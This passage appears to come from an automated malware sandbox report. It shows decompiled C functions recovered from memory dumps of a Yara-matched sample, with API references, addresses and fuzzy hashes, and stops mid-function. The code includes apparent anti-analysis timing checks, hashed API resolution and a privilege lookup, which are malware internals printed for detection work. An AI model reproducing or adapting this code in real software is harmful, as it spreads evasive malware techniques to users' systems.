                                                                                                                                                        Function 008BFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                        			E00409A90(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B810( &_v284, 0x104);
						E0041BE80( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                                                                                        0x00409a9b
                                                                                                                                                        0x00409aa3
                                                                                                                                                        0x00409aa5
                                                                                                                                                        0x00409aaa
                                                                                                                                                        0x00409aaf
                                                                                                                                                        0x00409ac2
                                                                                                                                                        0x00409ac7
                                                                                                                                                        0x00409ad0
                                                                                                                                                        0x00409adc
                                                                                                                                                        0x00409aef
                                                                                                                                                        0x00409af4
                                                                                                                                                        0x00409af7
                                                                                                                                                        0x00409b00
                                                                                                                                                        0x00409b12
                                                                                                                                                        0x00409b17
                                                                                                                                                        0x00409b1c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409b1e
                                                                                                                                                        0x00409b22
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409b24
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409b22
                                                                                                                                                        0x00409b26
                                                                                                                                                        0x00409b29
                                                                                                                                                        0x00409b2f
                                                                                                                                                        0x00409b31
                                                                                                                                                        0x00409b3c
                                                                                                                                                        0x00409b41
                                                                                                                                                        0x00409b44
                                                                                                                                                        0x00409b51
                                                                                                                                                        0x00409b5c
                                                                                                                                                        0x00409b5e
                                                                                                                                                        0x00409b64
                                                                                                                                                        0x00409b68
                                                                                                                                                        0x00409b6b
                                                                                                                                                        0x00409b6b
                                                                                                                                                        0x00409b72
                                                                                                                                                        0x00409b75
                                                                                                                                                        0x00409b7a
                                                                                                                                                        0x00409b87
                                                                                                                                                        0x00409ab6
                                                                                                                                                        0x00409ab6
                                                                                                                                                        0x00409ab6

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                                                                                        • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                                                                                                                        • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                                                                                        • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041A062, Relevance: 3.0, APIs: 2, Instructions: 48memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                        			E0041A062(signed int __ecx, void* __edx, void* __edi, long _a4, void* _a8) {
				void* _v0;
				intOrPtr _v4;
				char _t16;

				 *(__edx - 0x48) =  *(__edx - 0x48) | __ecx;
				asm("jecxz 0xffffffd2");
				asm("lodsd");
				_t13 = _v4;
				_push(_t25);
				_t6 = _t13 + 0xc74; // 0xc74
				E0041A960(__edi, _v4, _t6,  *((intOrPtr*)(_v4 + 0x10)), 0, 0x35);
				_t16 = RtlFreeHeap(_v0, _a4, _a8); // executed
				return _t16;
			}






                                                                                                                                                        0x0041a066
                                                                                                                                                        0x0041a069
                                                                                                                                                        0x0041a06b
                                                                                                                                                        0x0041a073
                                                                                                                                                        0x0041a079
                                                                                                                                                        0x0041a07f
                                                                                                                                                        0x0041a087
                                                                                                                                                        0x0041a09d
                                                                                                                                                        0x0041a0a1

                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocateFree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2488874121-0
                                                                                                                                                        • Opcode ID: aa409ace8769739c721656b1954b57ba655222d83e4033bfb3458015cb861e3e
                                                                                                                                                        • Instruction ID: 9aec99f80d979829763f658558517c8ea97e6c987ab51b0632fcd2482d9baa97
                                                                                                                                                        • Opcode Fuzzy Hash: aa409ace8769739c721656b1954b57ba655222d83e4033bfb3458015cb861e3e
                                                                                                                                                        • Instruction Fuzzy Hash: BB01F2B92052446FD714DF24DC81DDB7BA8EF85314F15898DF84817302C230E854CBB1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00408373, Relevance: 1.7, APIs: 1, Instructions: 193threadwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                                        			E00408373(void* __eax, void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, int _a8, long _a12, int _a16) {
				int _v8;
				char _v64;
				int _v132;
				int _v136;
				char _v656;
				int _v668;
				char _v684;
				char _v688;
				int __esi;
				void* __ebp;
				void* _t66;
				int _t67;
				void* _t76;
				long _t77;
				int _t81;
				void* _t83;

				_t76 = __edi - 1;
				_t89 = _t76;
				if(_t76 < 0) {
					E0041C400( &_v64, 3);
					_t66 = E0040ACD0(_t89, _a8 + 0x1c,  &_v64); // executed
					_t67 = E00414E20(_a8 + 0x1c, _t66, 0, 0, 0xc4e7b6d6);
					_t81 = _t67;
					if(_t81 != 0) {
						_push(_t76);
						_t77 = _a12;
						_t67 = PostThreadMessageW(_t77, 0x111, 0, 0); // executed
						_t91 = _t67;
						if(_t67 == 0) {
							_t67 =  *_t81(_t77, 0x8003, _t83 + (E0040A460(_t91, 1, 8) & 0x000000ff) - 0x40, _t67);
						}
					}
					return _t67;
				} else {
					__al = __al ^ 0x0000006f;
					_t7 = __ecx + 0x40;
					_t8 = __ebx;
					__ebx =  *_t7;
					 *_t7 = _t8;
					asm("arpl [ebp+0x5518c14c], sp");
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v8 = 0;
					_v688 = 0;
					 &_v684 = E0041B860( &_v684, 0, 0x2a4);
					__esi = _a16;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a4;
					__eax = E004082F0(__eflags, __edi,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041B150(__ecx);
					_t17 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t17;
					_a16 = 0;
					while(1) {
						__eax = E0040F640(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E00419F00(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *(__esi + 0x2dc) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L13:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L17;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L13;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L13;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E0041B7E0(_a12,  &_v688, 0x2a8);
										L17:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E00419E90(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *(_a12 + 0x14) = _v668;
											__edx =  *(__esi + 0x2d0);
											_t37 = __esi + 0x2e8; // 0x2e8
											__eax = _t37;
											_push(__eax);
											 *__eax = _v136;
											__eax = _a12;
											_t39 = __esi + 0x314; // 0x314
											__ebx = _t39;
											_push(__ebx);
											__ecx = 0;
											_push( *(__esi + 0x2d0));
											__eax = _a12 + 0x220;
											_push(_a12 + 0x220);
											_push(__edi);
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E00419710();
											__ecx = 0;
											__esp = __esp + 0x14;
											 *(__esi + 0x2dc) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t47 = __esi + 0x2e0; // 0x2e0
												__eax = _t47;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *(__esi + 0x2e4) = _v132;
												 *__ebx = 0x18;
												 *(__esi + 0x2d0) = 0x1a;
												__eax = E00419750(__edi, _a12 + 0x224, 0x1a, __ebx, _t47);
												 *(__esi + 0x2dc) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
													__eflags =  *(__edx + 0x10) + 0x200;
													__eax = E0041ADF0(__ecx);
													__ebx = __eax;
													__eax =  *(__ebx + 0x28);
													__eax = E0041BAD0( *(__ebx + 0x28));
													__edx =  *(__ebx + 0x28);
													_t62 = __eax + 2; // 0x2
													__ecx = __eax + _t62;
													__eax =  &_v656;
													__eax = E00414A20(__edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						goto L21;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L21:
			}



















                                                                                                                                                        0x00408373
                                                                                                                                                        0x00408373
                                                                                                                                                        0x00408374
                                                                                                                                                        0x0040830e
                                                                                                                                                        0x0040831e
                                                                                                                                                        0x0040832e
                                                                                                                                                        0x00408333
                                                                                                                                                        0x0040833a
                                                                                                                                                        0x0040833c
                                                                                                                                                        0x0040833d
                                                                                                                                                        0x0040834a
                                                                                                                                                        0x0040834c
                                                                                                                                                        0x0040834e
                                                                                                                                                        0x0040836b
                                                                                                                                                        0x0040836b
                                                                                                                                                        0x0040836d
                                                                                                                                                        0x00408372
                                                                                                                                                        0x00408376
                                                                                                                                                        0x00408376
                                                                                                                                                        0x00408378
                                                                                                                                                        0x00408378
                                                                                                                                                        0x00408378
                                                                                                                                                        0x00408378
                                                                                                                                                        0x0040837b
                                                                                                                                                        0x00408380
                                                                                                                                                        0x00408381
                                                                                                                                                        0x00408383
                                                                                                                                                        0x00408389
                                                                                                                                                        0x0040838a
                                                                                                                                                        0x0040838b
                                                                                                                                                        0x0040838c
                                                                                                                                                        0x00408394
                                                                                                                                                        0x00408397
                                                                                                                                                        0x004083a4
                                                                                                                                                        0x004083a9
                                                                                                                                                        0x004083ac
                                                                                                                                                        0x004083b2
                                                                                                                                                        0x004083b7
                                                                                                                                                        0x004083bf
                                                                                                                                                        0x004083ca
                                                                                                                                                        0x004083ca
                                                                                                                                                        0x004083d1
                                                                                                                                                        0x004083e0
                                                                                                                                                        0x004083e6
                                                                                                                                                        0x004083eb
                                                                                                                                                        0x004083f8
                                                                                                                                                        0x00408402
                                                                                                                                                        0x0040840a
                                                                                                                                                        0x00408410
                                                                                                                                                        0x00408412
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408414
                                                                                                                                                        0x0040841c
                                                                                                                                                        0x00408436
                                                                                                                                                        0x00408436
                                                                                                                                                        0x00408439
                                                                                                                                                        0x0040843a
                                                                                                                                                        0x0040843d
                                                                                                                                                        0x00408440
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408442
                                                                                                                                                        0x00408442
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408442
                                                                                                                                                        0x0040841e
                                                                                                                                                        0x0040841e
                                                                                                                                                        0x00408425
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408427
                                                                                                                                                        0x00408427
                                                                                                                                                        0x0040842e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408430
                                                                                                                                                        0x00408430
                                                                                                                                                        0x00408434
                                                                                                                                                        0x00408450
                                                                                                                                                        0x00408458
                                                                                                                                                        0x00408460
                                                                                                                                                        0x00408465
                                                                                                                                                        0x0040846d
                                                                                                                                                        0x0040846d
                                                                                                                                                        0x00408475
                                                                                                                                                        0x0040847d
                                                                                                                                                        0x0040847f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408481
                                                                                                                                                        0x00408481
                                                                                                                                                        0x00408487
                                                                                                                                                        0x0040848a
                                                                                                                                                        0x00408490
                                                                                                                                                        0x00408493
                                                                                                                                                        0x00408499
                                                                                                                                                        0x00408499
                                                                                                                                                        0x0040849f
                                                                                                                                                        0x004084a0
                                                                                                                                                        0x004084a2
                                                                                                                                                        0x004084a5
                                                                                                                                                        0x004084a5
                                                                                                                                                        0x004084ab
                                                                                                                                                        0x004084ac
                                                                                                                                                        0x004084ae
                                                                                                                                                        0x004084af
                                                                                                                                                        0x004084b4
                                                                                                                                                        0x004084b5
                                                                                                                                                        0x004084b6
                                                                                                                                                        0x004084bc
                                                                                                                                                        0x004084c2
                                                                                                                                                        0x004084c8
                                                                                                                                                        0x004084ce
                                                                                                                                                        0x004084d4
                                                                                                                                                        0x004084da
                                                                                                                                                        0x004084df
                                                                                                                                                        0x004084e1
                                                                                                                                                        0x004084e4
                                                                                                                                                        0x004084ea
                                                                                                                                                        0x004084ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004084f2
                                                                                                                                                        0x004084f2
                                                                                                                                                        0x004084f5
                                                                                                                                                        0x004084f5
                                                                                                                                                        0x004084fc
                                                                                                                                                        0x00408502
                                                                                                                                                        0x00408508
                                                                                                                                                        0x0040850e
                                                                                                                                                        0x00408514
                                                                                                                                                        0x00408520
                                                                                                                                                        0x00408528
                                                                                                                                                        0x0040852e
                                                                                                                                                        0x00408534
                                                                                                                                                        0x0040853e
                                                                                                                                                        0x00408546
                                                                                                                                                        0x0040854c
                                                                                                                                                        0x0040854e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408554
                                                                                                                                                        0x00408554
                                                                                                                                                        0x0040855a
                                                                                                                                                        0x0040855a
                                                                                                                                                        0x00408560
                                                                                                                                                        0x0040856d
                                                                                                                                                        0x0040856f
                                                                                                                                                        0x00408573
                                                                                                                                                        0x00408578
                                                                                                                                                        0x0040857b
                                                                                                                                                        0x0040857b
                                                                                                                                                        0x0040858b
                                                                                                                                                        0x00408593
                                                                                                                                                        0x0040859b
                                                                                                                                                        0x0040859c
                                                                                                                                                        0x0040859d
                                                                                                                                                        0x0040859e
                                                                                                                                                        0x004085a0
                                                                                                                                                        0x004085a1
                                                                                                                                                        0x004085a1
                                                                                                                                                        0x0040854e
                                                                                                                                                        0x004084ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00408434
                                                                                                                                                        0x0040842e
                                                                                                                                                        0x00408425
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0040841c
                                                                                                                                                        0x00408447
                                                                                                                                                        0x00408448
                                                                                                                                                        0x00408449
                                                                                                                                                        0x00408449
                                                                                                                                                        0x0040844b
                                                                                                                                                        0x0040844c
                                                                                                                                                        0x0040844e
                                                                                                                                                        0x0040844f
                                                                                                                                                        0x0040844f
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: a390b28a58e7ae41994f6e424405bce2cf203896ccd39edfa2a2b5c8d00e25c4
                                                                                                                                                        • Instruction ID: dc6d07c72bb78a90db0061758641a327e1d61a1649643fe0ac9d2d05e9e25f21
                                                                                                                                                        • Opcode Fuzzy Hash: a390b28a58e7ae41994f6e424405bce2cf203896ccd39edfa2a2b5c8d00e25c4
                                                                                                                                                        • Instruction Fuzzy Hash: 1F61C570900309AFDB24DF64CC85FEB77A8EF44704F10446EF949A7281EB746941CBA9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                        			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                                                        0x004082f0
                                                                                                                                                        0x004082ff
                                                                                                                                                        0x00408303
                                                                                                                                                        0x0040830e
                                                                                                                                                        0x0040831e
                                                                                                                                                        0x0040832e
                                                                                                                                                        0x00408333
                                                                                                                                                        0x0040833a
                                                                                                                                                        0x0040833d
                                                                                                                                                        0x0040834a
                                                                                                                                                        0x0040834c
                                                                                                                                                        0x0040834e
                                                                                                                                                        0x0040836b
                                                                                                                                                        0x0040836b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0040836d
                                                                                                                                                        0x00408372

                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                                                                                                                        • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                                                                                                                        • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                                                                                                                        • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                        0x0041a07f
                                                                                                                                                        0x0041a087
                                                                                                                                                        0x0041a09d
                                                                                                                                                        0x0041a0a1

                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                        • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                                                                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                        • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                        0x0041a047
                                                                                                                                                        0x0041a05d
                                                                                                                                                        0x0041a061

                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                        • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                                                                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                        • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                        0x0041a1ea
                                                                                                                                                        0x0041a200
                                                                                                                                                        0x0041a204

                                                                                                                                                        APIs
                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                        • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                                                                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                        • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
